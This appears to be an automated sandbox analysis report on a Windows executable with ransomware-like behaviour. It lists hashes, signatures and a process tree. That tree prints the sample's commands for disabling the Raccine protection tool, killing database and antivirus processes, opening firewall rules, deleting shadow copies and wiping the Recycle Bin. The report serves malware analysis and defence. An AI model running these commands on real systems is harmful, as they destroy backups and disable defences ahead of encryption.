8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7

Resubmissions

07-06-2021 10:08

210607-9hpr7n82ba 10

03-06-2021 20:20

210603-mpsat3rm4j 10

Analysis

max time kernel
28s
max time network
62s
platform
windows7_x64
resource
win7v20210410
submitted
07-06-2021 10:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

gVcWDWENI8.exe
Size

142KB
MD5

e1f063d63a75e0e0e864052b1a50ab06
SHA1

75d941a28cf0ade2ef2c16dfacbdeb36a51ccaf7
SHA256

8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7
SHA512

25681b210ee18bd60ba3fef496769283d51dc516569e1f1834d6d23a5927c1684b25ff67baf5fba66c908b364a13784f49facdde7a98b2fb8a8a41a2ec792ae3

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
768	taskkill.exe
1864	taskkill.exe
620	taskkill.exe
900	taskkill.exe
1436	taskkill.exe
1732	taskkill.exe
1176	taskkill.exe
1476	taskkill.exe
1248	taskkill.exe
1484	taskkill.exe
1076	taskkill.exe
824	taskkill.exe
600	taskkill.exe
2044	taskkill.exe
760	taskkill.exe
1596	taskkill.exe
864	taskkill.exe
1680	taskkill.exe
536	taskkill.exe
800	taskkill.exe
1144	taskkill.exe
960	taskkill.exe
1432	taskkill.exe
1368	taskkill.exe
1248	taskkill.exe
600	taskkill.exe
268	taskkill.exe
1768	taskkill.exe
1480	taskkill.exe
1564	taskkill.exe
924	taskkill.exe
328	taskkill.exe
1824	taskkill.exe
1956	taskkill.exe
1848	taskkill.exe
956	taskkill.exe
1808	taskkill.exe
1688	taskkill.exe
1552	taskkill.exe
532	taskkill.exe
892	taskkill.exe
1300	taskkill.exe
1912	taskkill.exe
1052	taskkill.exe
644	taskkill.exe
524	taskkill.exe
1160	taskkill.exe
1752	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1472 reg.exe

pid	process
1472	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

gVcWDWENI8.exe

pid	process
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe
1072	gVcWDWENI8.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

gVcWDWENI8.exetaskkill.exetaskkill.execonhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1072	gVcWDWENI8.exe
Token: SeDebugPrivilege	524	taskkill.exe
Token: SeDebugPrivilege	1248	taskkill.exe
Token: SeDebugPrivilege	1480	conhost.exe
Token: SeDebugPrivilege	600	taskkill.exe
Token: SeDebugPrivilege	1436	taskkill.exe
Token: SeDebugPrivilege	532	taskkill.exe
Token: SeDebugPrivilege	892	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	536	taskkill.exe
Token: SeDebugPrivilege	1732	taskkill.exe
Token: SeDebugPrivilege	1752	taskkill.exe
Token: SeDebugPrivilege	800	taskkill.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	1912	taskkill.exe
Token: SeDebugPrivilege	268	taskkill.exe
Token: SeDebugPrivilege	960	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	768	taskkill.exe
Token: SeDebugPrivilege	1300	taskkill.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	1432	taskkill.exe
Token: SeDebugPrivilege	600	taskkill.exe
Token: SeDebugPrivilege	2044	taskkill.exe
Token: SeDebugPrivilege	1052	taskkill.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	760	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	1476	taskkill.exe
Token: SeDebugPrivilege	644	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	864	taskkill.exe
Token: SeDebugPrivilege	1688	taskkill.exe
Token: SeDebugPrivilege	1248	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	1680	taskkill.exe
Token: SeDebugPrivilege	1864	taskkill.exe
Token: SeDebugPrivilege	1368	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe
Token: SeDebugPrivilege	620	taskkill.exe
Token: SeDebugPrivilege	1076	taskkill.exe
Token: SeDebugPrivilege	1848	taskkill.exe
Token: SeDebugPrivilege	328	taskkill.exe
Token: SeDebugPrivilege	824	taskkill.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	900	taskkill.exe
Token: SeDebugPrivilege	980	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

gVcWDWENI8.exe

description	pid	process	target process
PID 1072 wrote to memory of 524	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 524	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 524	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 572	1072	gVcWDWENI8.exe	reg.exe
PID 1072 wrote to memory of 572	1072	gVcWDWENI8.exe	reg.exe
PID 1072 wrote to memory of 572	1072	gVcWDWENI8.exe	reg.exe
PID 1072 wrote to memory of 1472	1072	gVcWDWENI8.exe	reg.exe
PID 1072 wrote to memory of 1472	1072	gVcWDWENI8.exe	reg.exe
PID 1072 wrote to memory of 1472	1072	gVcWDWENI8.exe	reg.exe
PID 1072 wrote to memory of 1956	1072	gVcWDWENI8.exe	schtasks.exe
PID 1072 wrote to memory of 1956	1072	gVcWDWENI8.exe	schtasks.exe
PID 1072 wrote to memory of 1956	1072	gVcWDWENI8.exe	schtasks.exe
PID 1072 wrote to memory of 300	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 300	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 300	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 1184	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 1184	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 1184	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 644	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 644	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 644	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 596	1072	gVcWDWENI8.exe	netsh.exe
PID 1072 wrote to memory of 596	1072	gVcWDWENI8.exe	netsh.exe
PID 1072 wrote to memory of 596	1072	gVcWDWENI8.exe	netsh.exe
PID 1072 wrote to memory of 1912	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 1912	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 1912	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 1144	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 1144	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 1144	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 752	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 752	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 752	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 1632	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 1632	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 1632	1072	gVcWDWENI8.exe	sc.exe
PID 1072 wrote to memory of 268	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 268	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 268	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 328	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 328	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 328	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 1480	1072	gVcWDWENI8.exe	conhost.exe
PID 1072 wrote to memory of 1480	1072	gVcWDWENI8.exe	conhost.exe
PID 1072 wrote to memory of 1480	1072	gVcWDWENI8.exe	conhost.exe
PID 1072 wrote to memory of 1248	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 1248	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 1248	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 600	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 600	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 600	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 1436	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 1436	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 1436	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 532	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 532	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 532	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 1220	1072	gVcWDWENI8.exe	arp.exe
PID 1072 wrote to memory of 1220	1072	gVcWDWENI8.exe	arp.exe
PID 1072 wrote to memory of 1220	1072	gVcWDWENI8.exe	arp.exe
PID 1072 wrote to memory of 892	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 892	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 892	1072	gVcWDWENI8.exe	taskkill.exe
PID 1072 wrote to memory of 1160	1072	gVcWDWENI8.exe	taskkill.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

gVcWDWENI8.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	gVcWDWENI8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	gVcWDWENI8.exe

C:\Users\Admin\AppData\Local\Temp\gVcWDWENI8.exe
"C:\Users\Admin\AppData\Local\Temp\gVcWDWENI8.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1072
- C:\Windows\system32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:524
- C:\Windows\system32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:572
- C:\Windows\system32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1472
- C:\Windows\system32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1956
- C:\Windows\system32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:300
- C:\Windows\system32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:644
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1184
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:596
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1912
- C:\Windows\system32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1144
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:752
- C:\Windows\system32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:1632
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:268
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:328
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:1480
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  PID:1248
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:600
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1436
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:532
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:1220
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:892
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1160
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:536
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1732
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1752
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:800
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:268
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1144
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1912
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:960
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1824
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1564
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1176
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:768
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1300
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:956
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:600
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2044
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1052
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1808
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:760
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1956
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:644
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1476
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1596
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:864
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1688
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1248
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1552
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1680
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1864
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1484
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1368
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:620
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1848
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1076
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:328
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:924
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:824
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1768
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:980
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1704

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-865606552271263082974438388-871688277-446176315-1083529819195851946-1444366919"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1480

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/268-75-0x0000000000000000-mapping.dmp

Download
memory/268-92-0x0000000000000000-mapping.dmp

Download
memory/300-66-0x0000000000000000-mapping.dmp

Download
memory/328-121-0x0000000000000000-mapping.dmp

Download
memory/328-76-0x0000000000000000-mapping.dmp

Download
memory/524-62-0x0000000000000000-mapping.dmp

Download
memory/532-82-0x0000000000000000-mapping.dmp

Download
memory/536-86-0x0000000000000000-mapping.dmp

Download
memory/572-63-0x0000000000000000-mapping.dmp

Download
memory/596-72-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp

Filesize
8KB

Download
memory/596-69-0x0000000000000000-mapping.dmp

Download
memory/600-101-0x0000000000000000-mapping.dmp

Download
memory/600-79-0x0000000000000000-mapping.dmp

Download
memory/620-118-0x0000000000000000-mapping.dmp

Download
memory/644-68-0x0000000000000000-mapping.dmp

Download
memory/644-108-0x0000000000000000-mapping.dmp

Download
memory/752-73-0x0000000000000000-mapping.dmp

Download
memory/760-104-0x0000000000000000-mapping.dmp

Download
memory/768-97-0x0000000000000000-mapping.dmp

Download
memory/800-89-0x0000000000000000-mapping.dmp

Download
memory/824-123-0x0000000000000000-mapping.dmp

Download
memory/864-110-0x0000000000000000-mapping.dmp

Download
memory/892-84-0x0000000000000000-mapping.dmp

Download
memory/900-125-0x0000000000000000-mapping.dmp

Download
memory/924-122-0x0000000000000000-mapping.dmp

Download
memory/956-99-0x0000000000000000-mapping.dmp

Download
memory/960-94-0x0000000000000000-mapping.dmp

Download
memory/980-130-0x000000001AAD0000-0x000000001AAD2000-memory.dmp

Filesize
8KB

Download
memory/980-132-0x00000000023F0000-0x00000000023F1000-memory.dmp

Filesize
4KB

Download
memory/980-133-0x0000000002570000-0x0000000002571000-memory.dmp

Filesize
4KB

Download
memory/980-131-0x000000001AAD4000-0x000000001AAD6000-memory.dmp

Filesize
8KB

Download
memory/980-126-0x0000000000000000-mapping.dmp

Download
memory/980-128-0x00000000024A0000-0x00000000024A1000-memory.dmp

Filesize
4KB

Download
memory/980-129-0x000000001AB50000-0x000000001AB51000-memory.dmp

Filesize
4KB

Download
memory/1052-103-0x0000000000000000-mapping.dmp

Download
memory/1072-59-0x0000000000B40000-0x0000000000B41000-memory.dmp

Filesize
4KB

Download
memory/1072-61-0x000000001B010000-0x000000001B012000-memory.dmp

Filesize
8KB

Download
memory/1076-120-0x0000000000000000-mapping.dmp

Download
memory/1144-71-0x0000000000000000-mapping.dmp

Download
memory/1144-91-0x0000000000000000-mapping.dmp

Download
memory/1160-85-0x0000000000000000-mapping.dmp

Download
memory/1176-96-0x0000000000000000-mapping.dmp

Download
memory/1184-67-0x0000000000000000-mapping.dmp

Download
memory/1220-83-0x0000000000000000-mapping.dmp

Download
memory/1248-112-0x0000000000000000-mapping.dmp

Download
memory/1248-78-0x0000000000000000-mapping.dmp

Download
memory/1300-98-0x0000000000000000-mapping.dmp

Download
memory/1368-116-0x0000000000000000-mapping.dmp

Download
memory/1432-100-0x0000000000000000-mapping.dmp

Download
memory/1436-81-0x0000000000000000-mapping.dmp

Download
memory/1472-64-0x0000000000000000-mapping.dmp

Download
memory/1476-107-0x0000000000000000-mapping.dmp

Download
memory/1480-77-0x0000000000000000-mapping.dmp

Download
memory/1484-117-0x0000000000000000-mapping.dmp

Download
memory/1552-113-0x0000000000000000-mapping.dmp

Download
memory/1564-93-0x0000000000000000-mapping.dmp

Download
memory/1596-109-0x0000000000000000-mapping.dmp

Download
memory/1632-74-0x0000000000000000-mapping.dmp

Download
memory/1680-114-0x0000000000000000-mapping.dmp

Download
memory/1688-111-0x0000000000000000-mapping.dmp

Download
memory/1704-134-0x0000000000000000-mapping.dmp

Download
memory/1732-87-0x0000000000000000-mapping.dmp

Download
memory/1752-88-0x0000000000000000-mapping.dmp

Download
memory/1768-124-0x0000000000000000-mapping.dmp

Download
memory/1808-105-0x0000000000000000-mapping.dmp

Download
memory/1824-95-0x0000000000000000-mapping.dmp

Download
memory/1848-119-0x0000000000000000-mapping.dmp

Download
memory/1864-115-0x0000000000000000-mapping.dmp

Download
memory/1912-70-0x0000000000000000-mapping.dmp

Download
memory/1912-90-0x0000000000000000-mapping.dmp

Download
memory/1956-106-0x0000000000000000-mapping.dmp

Download
memory/1956-65-0x0000000000000000-mapping.dmp

Download
memory/2044-102-0x0000000000000000-mapping.dmp

Download